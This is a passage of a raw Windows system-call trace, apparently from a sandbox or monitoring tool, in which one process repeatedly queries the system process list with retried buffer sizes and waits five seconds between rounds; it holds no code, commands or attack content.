BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0190.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0190.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.329] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0190.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0190.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.642] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0190.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0191.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.127] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0191.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0191.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.361] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0191.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0191.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.576] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0191.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0191.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.923] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0191.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0192.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.138] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0192.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0192.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0192.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.308] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0192.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0192.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0192.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.564] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0192.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0192.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0193.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.044] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0193.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0193.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.555] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0193.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0193.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.861] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0193.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0193.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0193.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0193.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0193.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0194.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.528] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0194.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0194.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0194.940] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0194.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0194.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0194.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0194.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0194.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0195.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0195.183] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0195.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0195.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0195.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0195.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0195.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0196.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.380] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0196.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0196.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.671] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0196.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0196.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0196.938] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0196.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0196.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0196.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0196.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0196.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0197.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.252] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0197.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0197.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.602] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0197.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0198.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.075] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.076] 